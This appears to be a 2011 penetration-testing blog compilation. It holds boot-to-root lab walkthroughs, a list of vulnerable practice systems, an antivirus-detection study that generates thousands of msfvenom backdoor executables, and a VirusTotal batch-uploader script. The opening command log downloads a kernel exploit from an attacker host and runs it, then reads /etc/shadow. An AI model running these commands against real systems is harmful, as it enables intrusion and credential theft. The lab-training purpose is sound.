cd /pentest/exploits/exploitdb
cat files.csv | egrep -i "linux|kernel|local" | grep -v dos | uniq | grep 2.6.8
cat files.csv | egrep -i "linux|kernel|local" | grep -v dos | uniq | grep 2.6 | cut -d "," -f 3 | sort
cat files.csv | egrep -i "linux|kernel|local" | grep -v dos | uniq | grep 2.6 | egrep "<|<=" | sort -k3
cat platforms/linux/local/9574.txt
wget http://exploit-db.com/sploits/2009-therebel.tgz -O /var/www/exploit.tgz
chmod 755 /var/www/exploit.tgz
/etc/init.d/apache2 start

cd /tmp
wget 192.168.0.162/exploit.tgz
tar zxvf exploit.tgz
cd therebel
ls -lAh
bash therebel.sh
id
/sbin/ifconfig eth0 && uname -a && cat /etc/shadow && ls -lAh /root
cd /home
alias ls="ls -lAh"
ls
cd testuser
ls
cd stuff
ls
tar zxvf phrack67.tar.gz
ls 67

Notes

When starting the VM for the first time with VMware, select "I Moved It" - otherwise it could cause issues (e.g. the target will not be visible!).
Some mistakes in the video are more obvious.
Instead of using "php-reverse-shell" & "netcat", "PHP Meterpreter" & "Metasploit" could of been used.

Song(s): Libra Presents Taylor - Anomaly - Calling Your Name (Original BT & Taylor)
Video length: 09:24
Capture length: 35:02
Blog Post: http://g0tmi1k.blogspot.com/2011/12/video-vulnimage-automated-method.html
Forum Post: http://www.backtrack-linux.org/forums/showthread.php?t=47185&p=211917#post211917

~g0tmi1k

[Site News] Vulnerable by Design (Part 3)

2011-11-10T11:53:00.000Z

I've been slowly collecting various other 'Vulnerable by Design' programs. Below is a summary of what's new. The updated complete list can be found here: http://g0tmi1k.blogspot.com/2011/03/vulnerable-by-design.html.

'Complete' Operating Systems

(Offline) Web Based

[Updated] BodgeIT
[NEW] OWASP Hackademic Challenges Project
[NEW] OWASP Insecure Web App Project
[NEW] PuzzleMall
[Updated] SecuriBench
[NEW] PuzzleMall
[NEW] WAVSEP
[NEW] The Butterfly

(Online) Web Based

[NEW] hACME
[NEW] PCTechTips - pwn3d the login form.
[NEW] XSSMe
[NEW] XSS Me!
[NEW] Can You XSS This?
[NEW] Test x5s
[NEW] XSS Progphp
[NEW] XSS Quiz

[NEW] WarGames (Web Based)

Forensic

[NEW] SecuraLabs Challenge (#1, #2)

[NEW] Mobile Platforms

ExploitMe

[NEW] Capture The Flag Competitions

[Updated] Other collections & lists

If you know of any more - please let me know!

Issues & Updates with "Boots 2 Roots"

2011-11-02T11:58:00.000Z

As I use backtrack-linux for my attacker's operating system, the OS has gone though some major updates (new tools have been added, some removed and most of them been updated)!
As a result there are a few minor issues with my guides for boot 2 roots. The general process is the same, so I didn't see a "need" to re-do it all - I hope this quick note sums it all up!

Brute Forcing (Hydra)
It has been reported that Hydra isn't 'playing nice' with backtrack 5 R1 (which at the time is the latest release of backtrack), but it's happy with backtrack 5. On some machines running certain programs (e.g. hydra) inside VMware, it gives out tons of 'Waiting for child process' error messages.

De-ICE.net v2.0 (2.100) {Level 2 - Disk 1}
'JBroFuzz' is no longer included in backtrack. I would recommend using 'DirBuster' instead.
Eph demonstrates this in his video.

pWnOS
The local privilege escape DOES work - don’t have it connected to the Internet. (Auto updates?)

F4l13n5n0w has also found a few more vulnerability related this challenge.

Kioptrix - Level 2
Due to a coding bug (Line 16, missing a "'": <td algin='center'>) & using a newer version of firefox, after logging in the 'ping' page isn't displayed correctly. You can either:

Use the firefox addon 'Firebug' to edit the page content fixing the issue.
Seen in MagiaMystery's video: https://www.youtube.com/watch?v=sDR7oryS48g
Use 'BurpProxy' and craft the post request manually.
Seen in Lnxg33k's video: https://lnxg33k.wordpress.com/2011/08/20/video-kioptrix-level2-war-game-solution/

Kioptrix - Level 3
Swappage has done another method to escape privates to gain root access. Instead of using 'ht' to write file(s) in which to gain access, Swappage walks though the process of discovering and creating a exploit for the program instead!
Video: http://vimeo.com/28327470.

VulnImage
_pr0n_ has discovered another way to gain shell into this box by using Exim (Proof).

General message regarding all "boot 2 roots"
Don’t use it on your main or production network as:

You’re adding a vulnerable machine on your network - just making it weaker!
The machine could auto update - therefore breaking the challenge!

The target's virtual machine isn't showing up! Its not working! I can't find it! Help!
If the challenge is a ISO then VirtualBox, VMware and Parallels etc - should all work.
However if its a Virtual Machine, check the format it in and use that vendor.
Most of them are in VMware as it has the market share.
You can try and use another vendor, however don't expect it to work, due to each product using different drivers for interfaces - therefore there might not be any network activity.

When using VMware images, always select 'moved it'.
When you select 'copied it', it creates another interface, therefore it the automated, backend scripts are not configured to use the new interface.
The only issue with selecting 'move it', is if you have have another copy/version of that VM.
As you haven't got the another copy of it, it hasn't got anything to clash with.

Not every challenge is setup to use DHCP!
Some have static IP addresses (this is because the scripts & settings used have that IP assigned to it when it was created).
Read the 'readme' file and/or the homepage as it could mention the IP address/range which is used. Else I recommend using netdiscover.

Not every device respones to ping (ICMP) requests and these VM's are no exception. You might have to look into other methods of detecting machines on a network.

Links

Blogs, Feeds, Guides & Links

2011-11-01T20:17:00.000Z

*This wasn't meant to be live just yet!*

I scheduled all draft posts. I became ill and wasn't available to stop it from posting.

I was cleaning out my bookmarks, de-cluttering twitter favourites and closing a few tabs. Re-saw a few 'hidden gems' as well as repeating finding links for people, so I thought I would try and 'dump' them all in one place.
These are roughly sorted, if you're wanting something better - I highly recommend having a look at the pentest-bookmarks.

This list will be updated from time to time!

Programming & Coding
[Bash] Advanced Bash-Scripting Guide - http://tldp.org/LDP/abs/html/
[Bash] Bash shell scripting tutorial - http://steve-parker.org/sh/sh.shtml
[Bash] Bourne Shell Reference - http://linuxreviews.org/beginner/bash_GNU_Bourne-Again_SHell_Reference/
[CheatSheet] Scripting Languages: PHP, Perl, Python, Ruby - http://hyperpolyglot.org/scripting
[Tip] Forcing Scripts to Run as root - http://bashshell.net/shell-scripts/forcing-scripts-to-run-as-root/
[Tip] HTML5 Security Cheat Sheet - https://www.owasp.org/index.php/HTML5_Security_Cheat_Sheet
[Regex] Learn Regex The Hard Way (ALPHA) - http://regex.learncodethehardway.org

Programs & Scripts
[Program] HTML5 (plugin-free) web-based terminal emulator and SSH client - https://github.com/liftoff/GateOne
[Tips] Exploiting Powershell's Features (Not Flaws) - http://www.exploit-monday.com/2011/10/exploiting-powershells-features-not.html
[Tip] Shellcode in Powershell - http://pastebin.com/3mJ0jLRZ
[Program] easy-creds - http://sourceforge.net/projects/easy-creds/files/
[Program] ghost-phisher - http://code.google.com/p/ghost-phisher/
[Book] Network Security Tools - http://commons.oreilly.com/wiki/index.php/Network_Security_Tools
[Program] Password Security Scanner - http://www.nirsoft.net/utils/password_security_scanner.html
[Collection] Security Tools - http://securityxploded.com/tools.php

Tunnelling & Pivoting
[Linux] SSH gymnastics with proxychains - http://pauldotcom.com/2010/03/ssh-gymnastics-with-proxychain.html
[Windows] Nessus Through SOCKS Through Meterpreter - http://www.digininja.org/blog/nessus_over_sock4a_over_msf.php
[Shell] Reverse Shell Techniques for Linux - http://www.coresec.org/2011/05/28/reverse-shell-techniques-for-linux/
[Shell] Python One Line Shellcode - http://pauldotcom.com/2011/10/python-one-line-shell-code.html
[Shell] Reverse Shell with Bash - http://www.gnucitizen.org/blog/reverse-shell-with-bash/
[Shell] Reverse shells one-liners - http://bernardodamele.blogspot.com/2011/09/reverse-shells-one-liners.html
[Shell] Creating a 13 line backdoor worry free of A/V - http://www.secmaniac.com/blog/2011/06/20/creating-a-13-line-backdoor-worry-free-of-av/
[Meteterpreter] Get a meterpreter reverse shell through SSH tunnel - https://hdesser.wordpress.com/2011/12/03/quick-notes-get-a-meterpreter-reverse-shell-through-ssh-tunnel/
[Shell] Reverse Shell Cheat Sheet - http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet

Cheat-Sheets
[OS] A Sysadmin's Unixersal Translator - http://bhami.com/rosetta.html
[WiFi] WirelessDefence.org's Wireless Penetration Testing Framework - http://www.wirelessdefence.org/Contents/Wireless%20Pen%20Test%20Framework.html
[Programming] The Ultimate Anti-Debugging Reference - http://tuts4you.com/download.php?view.3260

File Include (Local & Remote)
[LFI] When All You Can Do Is Read - http://www.digininja.org/blog/when_all_you_can_do_is_read.php
[LFI] Local File Inclusion – Tricks of the Trade - http://labs.neohapsis.com/2008/07/21/local-file-inclusion-%E2%80%93-tricks-of-the-trade/
[LFI] LFI with phpinfo Assistance- http://www.insomniasec.com/publications/LFI%20With%20PHPInfo%20Assistance.pdf
[LFI] Exploiting PHP File Inclusion Overview - https://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/

WarGames / CTF / Challenges
[Challenges] The Ksplice Pointer Challenge - http://blogs.oracle.com/ksplice/
[Forensics] iAWACS 2011 Forensics challenge - http://cvo-lab.blogspot.com/2011/05/iawacs-2011-forensics-challenge.html
[CTF] Index Of / - http://ftp.hackerdom.ru/ctf-images/
[Forensics] Test Images and Forensic Challenges - http://www.forensicfocus.com/images-and-challenges
[WarGames] Pentest lab vulnerable servers-applications list - http://r00tsec.blogspot.com/2011/02/pentest-lab-vulnerable-servers.html
[WarGames] Practices for a Hacker (WarGames) - http://jhyx4life.blogspot.com/2007/02/practicas-para-un-hacker-wargames.html (English)
[Challenges] OWASP iGoat Project - https://www.owasp.org/index.php/OWASP_iGoat_Project
[Challenges] Can you crack it? - http://canyoucrackit.co.uk
[WarGames] Vanilla Dome Wargame - https://sm0k.org/dojo/vanilla.php
[CTF] Index Of / - http://repo.shell-storm.org/CTF/
[Boot2Root] Exploit-Exercises - http://exploit-exercises.com
[WarGames] try2hack - http://try2hack.nl
[Fuzzing] Resources - http://www.vdalabs.com/tools/efs_gpf.html
[Web] Web Application Vulnerability Scanner Evaluation Project - https://code.google.com/p/wavsep/
[Web] SQL Injection and Filter Evasion Challenge - http://www.modsecurity.org/demo/
[Walkthrough] preCON CTF Walkthrough - http://amolnaik4.blogspot.com/2011/12/clubhack-precon-ctf-walkthrough.html
[Walkthough] Rooting Kioptrix Level 1 in an Organized Fashion - http://securityjuggernaut.blogspot.com/2011/10/rooting-kioptrix-level-1-in-organized.html?spref=tw
http://pentest.cryptocity.net/capture-the-flag/
[Forensics] Forensic Challenge 8 - "Malware Reverse Engineering" - https://www.honeynet.org/node/668
[Collection] List of CTFs - http://x86overflow.blogspot.com/p/ctfs.html

Exploit Development (Programs)

[Download] Old Version Downloads - http://www.oldapps.com
[Download] Oldversions of Windows, Mac, Linux Software & Abandonware Games - http://www.oldversion.com
[Download] Exploit Database Search - http://www.exploit-db.com/search/

Kernel

Current Situation of Digital Security

2011-10-26T09:16:00.003+01:00

I will release the results at a later date (along with project it was intended for!).
As its for a current piece of university work, I don't wish to make it public until it has been marked.

Direct link (If you would prefer a new window/tab): *Survey is now closed*

---Update: 2010-12-19
Thanks to everyone who completed this! All 330 of you! =)
As promised, I donated £33.30 ($50.06) to "Hackers For Charity".
It's given me plenty to analyse and I will be releasing the results of it as soon as the piece of work has been graded.
Thanks once again.

[Analysis] Encoding Files

2011-10-09T18:28:00.000+01:00

Please note: If you're looking for methods on "how to bypass anti virus software" - this page isn't for you. Its more about:

How do different encoders compare?
Is there a relationship with increasing the encoded amount of time, does it get detected less?
By switching the payload, will this have a affect?
If a different template was used, would it still detected the same amount of times?
Does encoding make the file detected more than if it wasn't encoded at all?
Will the payload's operating system matter?
Which Anti Virus product was able to detect the most (and the least) amount?

Brief
The metasploit framework was used to generate a various combination of executable programs which would grant remote access (a 'backdoor') to the machine.

Upon the creation of each file, the output was uploaded to virustotal which was scanned using multiple anti virus products to reveal if any vendor was able to detect the "malicious malware".

Method
As metasploit customizes the output it creates, various settings were altered slightly each time upon creation, thus making each output unique slightly. In this experiment there were:

27x Encoders (Which algorithm to use)
5x Iterations (How many times to encode)
20x Payloads (What function to execute)
5x Templates (Which file to base the output around)

By looping through each of the above, each time modifying it once, the result produced 6750 unique files (please note: its not the 'full' amount as some factors are OS dependant, example; you can't use a windows program for a Linux template).

Each file was then uploaded to VirusTotal.com, which scans the file using 44 anti virus products (Please note: The signatures used on virustotal are more 'sensitive' rather than the ones found publicly. Therefore they have a higher detection rate). Virustotal.com services was used to save time as it automates the whole procedure and creates a report rather than manually scanning each file ourselves with every vendor.

VirusTotal.com has a public API feature, so to take advantage of this, a script (bmmvtu.py), was developed to automate this procedure, allowing for multiple files to scanned without any interaction.

Below is a list of all the variables used:

Anti Virus Products	Encoders	Iterations	Payloads	Templates (MD5)
AhnLab-V3	cmd/generic_sh	1	generic/custom (Linux & OSX & Windows)	calc.exe (0adf66d67ba98090cd5ce9166a7e323f)
AntiVir	cmd/ifs	5	linux/x86/meterpreter/bind_tcp-default	cmd.exe (6d778e0f95447e6546553eeea709d03c)
Antiy-AVL	cmd/printf_php_mq	10	linux/x86/meterpreter/reverse_tcp-default	default - template_x86_windows.exe (99addd5248236a60aeddbc35024cd2ab)
Avast	generic/none	25	linux/x86/shell/bind_tcp-default	default - template_x86_linux.bin (8892430dd8bdfdc29abdcba9560b4d66)
Avast5	mipsbe/longxor	100	linux/x86/shell/reverse_tcp-default	default - template_x86_darwin.bin (3c1738e7a0f1428d0ddb7d4e15cd4f1b)
AVG	mipsle/longxor		linux/x86/shell_bind_tcp-default	mspaint.exe (a68da24239c7ba6c424e1aeae7aa3e7a)
BitDefender	php/base64		linux/x86/shell_reverse_tcp-default	write.exe (bb75ed2cea65d2de97e88fde1b1a0bf8)
ByteHero	ppc/longxor		linux/x86/shell_reverse_tcp2-default
CAT-QuickHeal	ppc/longxor_tag		osx/x86/shell_bind_tcp-default
ClamAV	sparc/longxor_tag		osx/x86/shell_reverse_tcp-default
Commtouch	x64/xor		osx/x86/vforkshell/bind_tcp-default
Comodo	x86/alpha_mixed		osx/x86/vforkshell/reverse_tcp-default
DrWeb	x86/alpha_upper		osx/x86/vforkshell_bind_tcp-default
Emsisoft	x86/avoid_utf8_tolower		osx/x86/vforkshell_reverse_tcp-default
eSafe	x86/call4_dword_xor		windows/meterpreter/bind_tcp
eTrust-Vet	x86/context_cpuid		windows/meterpreter/reverse_tcp
F-Prot	x86/context_stat		windows/shell/bind_tcp
F-Secure	x86/context_time		windows/shell/reverse_tcp
Fortinet	x86/countdown		windows/shell_bind_tcp
GData	x86/fnstenv_mov		windows/shell_reverse_tcp
Ikarus	x86/jmp_call_additive
Jiangmin	x86/nonalpha
K7AntiVirus	x86/nonupper
Kaspersky	x86/shikata_ga_nai
McAfee	x86/single_static_bit
McAfee-GW-Edition	x86/unicode_mixed
Microsoft	x86/unicode_upper
NOD32
Norman
nProtect
Panda
PCTools
Prevx
Rising
Sophos
SUPERAntiSpyware
Symantec
TheHacker
TrendMicro
TrendMicro-HouseCall
VBA32
VIPRE
ViRobot
VirusBuster

The commands used are as follows:

echo "generic/shell_bind_tcp
generic/shell_reverse_tcp
windows/shell/bind_tcp
windows/shell_bind_tcp
windows/shell/reverse_tcp
windows/shell_reverse_tcp
windows/meterpreter/bind_tcp
windows/meterpreter/reverse_tcp
linux/x86/shell/bind_tcp
linux/x86/shell_bind_tcp
linux/x86/shell/reverse_tcp
linux/x86/shell_reverse_tcp
linux/x86/shell_reverse_tcp2
linux/x86/meterpreter/bind_tcp
linux/x86/meterpreter/reverse_tcp
osx/x86/shell_bind_tcp
osx/x86/vforkshell/bind_tcp
osx/x86/vforkshell_bind_tcp
osx/x86/shell_reverse_tcp
osx/x86/vforkshell/reverse_tcp
osx/x86/vforkshell_reverse_tcp
windows/dllinject/reverse_tcp
windows/patchupdllinject/reverse_tcp
windows/dllinject/bind_tcp
windows/patchupdllinject/bind_tcp" > /tmp/payload.txt

for y in {normal,*.exe} ; do
   for x in `msfvenom -l encoders 2>&1 >/dev/null | grep "/" | awk '{print $1}'`; do
      for i in {1,5,10,25,100}; do
        if [ "$y" == "normal" ] ; then
           msfvenom -p generic/custom -f exe -e $x -i $i PAYLOADSTR= > output/generic_-_custom-default~[$(echo $x | sed "s/\//_-_/g")]-$i.exe
        else
           msfvenom -p generic/custom -f exe -e $x -i $i -x $y PAYLOADSTR= > output/generic_-_custom-$y~[$(echo $x | sed "s/\//_-_/g")]-$i.exe
        fi
      done
   done
done
for payload in $(cat /tmp/payload.txt); do
   for y in {normal,*.exe} ; do
      for x in `msfvenom -l encoders 2>&1 >/dev/null | grep "/" | awk '{print $1}'`; do
         for i in {1,5,10,25,100}; do
            if [ "$y" == "normal" ] ; then
               msfvenom -p $payload -f exe -e $x -i $i --platform windows LHOST=127.0.0.1 LPORT=4444 RHOST=127.0.0.1 RPORT=5555 > output/$(echo $payload | sed "s/\//_-_/g")-default~[$(echo $x | sed 's/\//_-_/g')]-$i.exe
            else
               msfvenom -p $payload -f exe -e $x -i $i --platform windows -x $y LHOST=127.0.0.1 LPORT=4444 RHOST=127.0.0.1 RPORT=5555 > output/$(echo $payload | sed "s/\//_-_/g")-$y~[$(echo $x | sed "s/\//_-_/g")]-$i.exe
            fi
         done
      done
   done
done

for y in *.exe ; do
   python bmmvtu.py --output report-$y output/blank-$y*
done
for payload in $(cat /tmp/payload.txt); do
   for y in *.exe ; do
      python bmmvtu.py --output report-$(echo $payload | sed "s/\//_-_/g")-$y output/$(echo $payload | sed "s/\//_-_/g")-$y*
   done
done

for url in `cat /tmp/urls.txt`; do  ./CutyCapt --url=$(echo $url | cut -d, -f2) --out=/mnt/win/$(echo $url | cut -d, -f1).png; done

Results
Download: VirusTotal.com reports [PDF]
Download: Results [PNG] [Spreadsheet (xlsx)]
View: More Results *Below is only sample of the collect results. Sorry for the low resolution!*

Table 1 - Results Summary

Table 2 - Anti Virus Results

Graph 1 - Anti Virus performance

Graph 2 - Graph-Detection Rate for "generic/custom-calc.exe"

Graph 3 - Detection Rate for "OS Bind Shell"

Graph 4 - Detection Rate For Graph-Detection Rate for "Windows Meterpreter Bind (1 Iteration)"

Graph 5 - Detection Rate For Graph-Detection Rate for "Windows payloads (1 Iteration)"

Graph 6 - Iterations From 1 to 100

Graph 7 - Range of Encoders Efficiency

Graph 8 - Total Detects

Graph 9 - Total Rate Of Detection

Graph 10 - When Encoders Where Higher Than "generic/none"

Summary

Wasn't able to use every template

write.exe (wordpad) - failed every time.

Wasn't able to use every encoder, every time.

At 25 iterations - x86/alpha_mixed & x86/alpha_uppert stop working
At 100 iterations - php/base64 also stop working
x86/single_static_bit was also unable to complete a couple of times,

How do different encoders compare? Some are better than others; general use or for specific options
Is there a relationship with increasing the encoded amount of time, does it get detected less? No.
By switching the payload, will this have an affect? Minor difference.
If a different template was used, would it still detect the same amount of times? Minor difference.
Does encoding make the file become detected more than if it wasn't encoded at all? Yes, it can do!
Will the payload's operating system matter? Yes. Encoding didn't have a difference of Linux or OSX systems
Which Anti Virus product was able to detect the most (and the least) amount? GData &ViRobot respectively

Conclusion
To take this further...

What happens if the default values for the encoders were altered?
What happens if multiple encoders were linked together to create a single output?

[Script] BMMVTU.py - Batch/Mass/Multiple VirusTotal.com Uploader

2011-10-09T18:07:00.000+01:00

Links
Download (bmmvtu.py): http://www.mediafire.com/?de2c7tdtdkzdz2d

What is this?
A python script automate uploading files & getting the results from VirusTotal.com with their API system.

How do I use it?

The first thing is to sign up to VirusTotal.com and collect your unique API key.
Afterwords edit the script (line 14) with your API key.
Make sure you have Python 2.6+ & simplejson installed.
Run (See examples)

Screenshot

Examples
python bmmvtu.py
python bmmvtu.py --output report.csv evil1.exe evil2.exe evil3.exe
python bmmvtu.py -o report.txt files/*

Code

#!/usr/bin/python
#----------------------------------------------------------------------#
# Batch/Mass/Multiple VirusTotal.com Uploader (BMMVTU.py) v0.1 (2011-09-30)
#---Important----------------------------------------------------------#
# Python 2.6+ & simplejson needs to be installed before hand           #
# Left a few debug commands & incomplete features in comments          #
#                                                                      #
#         *** Do NOT use this for illegal or malicious use ***         #
#             YOU are using this script at YOUR OWN RISK.              #
#This software is provided "as is" WITHOUT ANY guarantees OR warranty. #
#----------------------------------------------------------------------#
import getopt,hashlib,httplib,itertools,mimetypes,os,pprint,simplejson,sys,time,urlparse
#-----------------------------------------------------------------------
key = ""   # Make sure to set this to your VirusTotal.com public API key.
sleepTime = 30                                                             # VirusTotal.com only allows 20 requests every 5 miniutes.
retry = 3                                                                  # The number of times to retry when something fails/Times to wait in the queue.
separator = "\t"                                                           # "," is commonly used for CSV files. TAB (\t) works well for pasting into spreadsheets.
#-----------------------------------------------------------------------
# Is it a valid file (Is it a file & its size)
def check_file(filename):
   if not os.path.isfile(filename):
      print "[-] Error: '%s' is not a valid file" % filename
      fout.write("Error!" + separator + "not a valid file" + separator + filename + "\n")
      return False

   filesize = os.path.getsize(filename)
   if filesize < 1 or filesize > 20971519:
      print "[-] Error: Filesize (%s bytes)" % filesize
      fout.write("Error!" + separator + "Filesize is wrong" + separator + filename + "\n")
      return False
   return True

# Get the results from VirusTotal.com
def get_report(resource):
   json = post_multipart("https://www.virustotal.com/api/get_file_report.json", {'resource':resource, 'key':key})
   return simplejson.loads(json)

# Checks the server response for the API (blocked or wrong key)
def result_status(result,resource):
   while result == -2:                                                     # Exceeded the public API request rate
      print "[-] Error: Exceeded the public API request rate (Waiting 60 second)"
      time.sleep(60)                                                       # Wait a bit before re-trying
      data = get_report(resource)                                          # Check to see if MD5 is in the database
      result = data['result']

   if result == -1:                                                        # API key provided is incorrect
      print "[-] Error: The API key provided is incorrect"
      help()
      sys.exit(1)                                                          # Quit, because we can't go further
   return

# Request the file to VirusTotal.com
def send_file(filename):
   files = [('file', filename, open(filename, 'rb').read())]
   json = post_multipart("https://www.virustotal.com/api/scan_file.json", {'key':key}, files)
   return simplejson.loads(json)

# The magic/behind the scene stuff/Under the bonnet
def do_files(filenames):
   numFiles = len(filenames)
   count = 0
   for filename in filenames:                                              # Do every file
      try:                                                                 # Keep going even if we get an error
         count += 1
         print "[>] Scanning %s/%s (%s)" % (str(count),str(numFiles),filename)

         if check_file(filename) != True:
            continue

         md5sum = hashlib.md5(open(filename, 'rb').read()).hexdigest()     # Find the file's MD5 value
         data = get_report(md5sum)                                         # Check to see if MD5 is in the database
         result_status(data['result'],md5sum)                              # Check server response
         if data['result'] != 1:                                           # Not known to VirusTotal.com
            for _ in itertools.repeat(None, retry):                        # Try xxx times to upload
               print "[>] File not found. Submitting (%s)" % filename
               data = send_file(filename)                                  # Send the file to be scanned
               if data['result'] == 1:                                     # Have we successfully uploaded it?
                  break                                                    # Yes!
               else:                                                       # No!   Other? Fallback/Safey net
                  print "[-] Error: Submit failed (%s)" % filename   # + str(pprint.pprint(data))
                  time.sleep(sleepTime)                                    # Wait a bit before re-trying

            if data['result'] != 1:                                        # Result != 1 if upload wasn't successful
               print "[-] Failed: Didn't submit (%s)" % filename
               fout.write("Failed!" + separator + "Didn't submit" + separator + filename + "\n")
               continue                                                    # Move on to the next file

            for _ in itertools.repeat(None, retry):                        # Try xxx times to check
               for o in data:                                              # Read all the JSON objects
                  if o == "report":                                        # Does VirusTotal.com have a report..
                     break                                                 # ...Yes! So quit
                  elif o == "scan_id":                                     # ...No. Still scanning
                     scan_id = data['scan_id']                             # Use the new scan ID value, rather than the MD5
                     print "[>] Waiting 60 seconds for VirusTotal.com to finish scanning (%s)" % scan_id
                     time.sleep(60)                                        # Wait a bit before re-trying
                  elif data['result'] == 0:                                # ...No. Does VirusTotal.com know of it yet?
                     print "[>] Waiting in the queue"
                     time.sleep(sleepTime)                                 # Wait a bit before re-trying
               data = get_report(scan_id)                                  # Check to see if MD5 is in the database
               result_status(data['result'],scan_id)                       # Check server response

            if data['result'] != 1:                                        # Result != 1 if upload wasn't successful
               print "[-] Failed: VirusTotal.com is still scanning or a large queue. Try again later or increase 'retry' (%s)" % filename
               fout.write("Failed!" + separator + "still scanning or a large queue" + separator + filename + "\n")
               #retry_files.append(scan_id)
               continue

         if count < numFiles:                                              # If we are not using the last file....
            time.sleep(sleepTime)                                          # Sleep between requests so as not to overload VirusTotal.com

         report = data['report']
         permalink = data['permalink']
         #scan_id = permalink.split('=')[1]

         timeStamp = report[0]
         reportEntries = report[1]
         numEntries = len(reportEntries)

         numDetects = 0
         entryValues = dict.values(reportEntries)
         for v in entryValues:
            if v != u'':
               numDetects += 1

         output_string = md5sum + separator + timeStamp + separator + filename + separator + str(numEntries) + separator +str(numDetects) + separator
         for k,v in sorted(reportEntries.iteritems()):
            k = k.encode("ascii")
            v = v.encode("ascii")
            if v == "":
               v = "-"
            output_string += k + separator + v + separator

         output_string += permalink

         fout.write(output_string + "\n")
         #pprint.pprint(data['report'])

      except Exception as e:
         print "[-] Error [1]: ", e
         fout.write("Error!" + separator + str(e) + separator + filename + "\n")

# Perform an HTTP POST request
def post_multipart(url, fields, files=()):
   content_type, data = encode_multipart_formdata(fields, files)
   url_parts = urlparse.urlparse(url)
   if url_parts.scheme == 'http':
      h = httplib.HTTPConnection(url_parts.netloc)
   elif url_parts.scheme == 'https':
      h = httplib.HTTPSConnection(url_parts.netloc)
   path = urlparse.urlunparse(('', '') + url_parts[2:])
   h.request('POST', path, data, {'content-type':content_type})
   return h.getresponse().read()

# Encoding the request
def encode_multipart_formdata(fields, files=()):
   BOUNDARY = '----------ThIs_Is_tHe_bouNdaRY_$'
   CRLF = '\r\n'
   L = []
   for key, value in fields.items():
      L.append('--' + BOUNDARY)
      L.append('Content-Disposition: form-data; name="%s"' % key)
      L.append('')
      L.append(value)
   for (key, filename, value) in files:
      L.append('--' + BOUNDARY)
      L.append('Content-Disposition: form-data; name="%s"; filename="%s"' % (key, filename))
      content_type = mimetypes.guess_type(filename)[0] or "application/octet-stream"
      L.append('Content-Type: %s' % content_type)
      L.append('')
      L.append(value)
   L.append('--' + BOUNDARY + '--')
   L.append('')
   body = CRLF.join(L)
   content_type = 'multipart/form-data; boundary=%s' % BOUNDARY
   return content_type, body

# Help screen
def help():
   print "\n\nAbout:"
   print "  This is a Python script which makes use of VirusTotal.com's public API, to automate scanning multiple files."
   print "  To use this you will need a \"API key\" from VirusTotal.com (Free signup).\n\n"
   print "bmmvtu.py --output  \n"
   print "Arguments:"
   print "  -o --output      Path of the file to write output to"
   print "  -h --help        Prints this help message\n\n"
   print "Example:"
   print "  bmmvtu.py -o results.csv evil1.exe evil2.exe"
   print "  bmmvtu.py --output results.txt folder/*\n"
#-----------------------------------------------------------------------
print "[*] Batch/Mass/Multiple VirusTotal.com Uploader (BMMVTU) v0.1 (2011-09-30)"

# Process arguments
opts, args = getopt.getopt(sys.argv[1:], "o:h", ["output=", "help"])
for o, a in opts:
   if o in ('-o', '--output'):
      outputFileName = a
   elif o in ('-h', '--help'):
      help()
      sys.exit(1)
   else:
      pass

# Check for valid number of arguments
if len(sys.argv) < 4:
   print "[-] Error: Invalid number of arguments"
   help()
   sys.exit(1)

# Check for API key
if len(key) != 64:
   print "[-] Error: Please provide a valid API key"
   help()
   sys.exit(1)

# Check the wait time
if sleepTime < 15:
   print "[!] Warning: Its recommended to wait at least 15 seconds between requests"

   if len(args) > 20:
      print "[!] Warning: You will quickly max out your API request rate"

try:
   fout = open(outputFileName, "w")
   fout.write("md5sum" + separator + "timeStamp" + separator + "filename" + separator + "NumberOfAVs" + separator + "NumberOfDetects" + separator + ("" + separator + " " + separator)* 44 + "permalink\n")

   #retry_files = list()                                                    # Retry these files (e.g. still waiting to be scanned)
   do_files(args)
   #do_files(retry_files)

   fout.close()

except Exception as e:
   print "[-] Error [0]: ", e

print "[*] Done!"

References
https://www.virustotal.com/advanced.html#publicapi

~g0tmi1k

[Video] Holynix - Level 2

2011-08-24T19:50:00.006+01:00

Links
Watch video on-line: http://blip.tv/g0tmi1k/holynix-level-2-5494348
Download video: http://www.mediafire.com/?70m714m55v4c6df

Brief Overview

Holynix is a series of operating systems with purposely designed weakness(es) left inside. The aim of them is to go from "boot-to-root"; the user has to try and get a shell with the highest user privilege they can reach.

Method

Scanned network for the target (Netdiscover)
Configured IP address (192.168.1.0/24)
Port scanned the target (unicornscan)
Banner grabbed the services running on the open ports (nmap)
Added the target's IP to the host file & Re-configured DNS settings
Successfully replicated the DNS databases (Zone Transfer)
Successfully brute forced web server directories (DirBuster)
Detected & exploited outdated software (phpMyAdmin)
Discovered an internal document (DirBuster)
Cracked FTP passwords (John The Ripper)
Uploaded a web backdoor (Metasploit)
Escalated privileges via a vulnerable kernel version
Located MySQL database details

What do I need?

kolynix-v2.tar.bz2 (MD5: 2B91038DE5C5150BFC48AA39C84E7E71) – (Homepage).
A virtual machine (Example: Virtual Box or VMware Player).
Netdiscover – (Can be found on BackTrack 5).
Nmap – (Can be found on BackTrack 5).
Unicornscan – (Can be found in BackTrack 5's repository).
DirBuster – (Can be found in BackTrack 5).
Exploit-DB – (Can be found on BackTrack 5).
John The Ripper – (Can be found on BackTrack 5).
Metasploit – (Can be found on BackTrack 5).

Walkthrough

To begin, the attacker needed to locate the target. This was accomplished by using "netdiscover", as it was able to scan for hosts on multiple IP ranges quickly. The output from the scan had the target on a different IP range from the DHCP server's pool, meaning the target had a static IP address. The IP address, MAC address and vendor was now known to the attacker and they updated their IP address to fit inside the same IP range as the target.

Once the attacker was in the same subnet as the target, the attacker completed a full port scan of both TCP & UDP on the target by using "unicornscan". When the scan had finished, the results showed that the target had four TCP ports open: 21, 22, 53 & 80, as well as one UDP port, 53.

Afterwards, the attacker wanted to know what services were being used on these ports. By using "nmap" to banner grab the services, the protocols and services (and possible versions) were able to be identified, along with finger printing the operating system which was being used. The outcome of the scan revealed that the services being used matched up to their default protocol ports; ftp, ssh, dns and web services.

The attacker then proceeded by interacting with the target's web server, and by doing so, they were able to find some useful information; the domain name, name servers and each user had their own sub-domain. The attacker updates their system to reflect the newly discovered information by replacing the DNS server to point to the target.

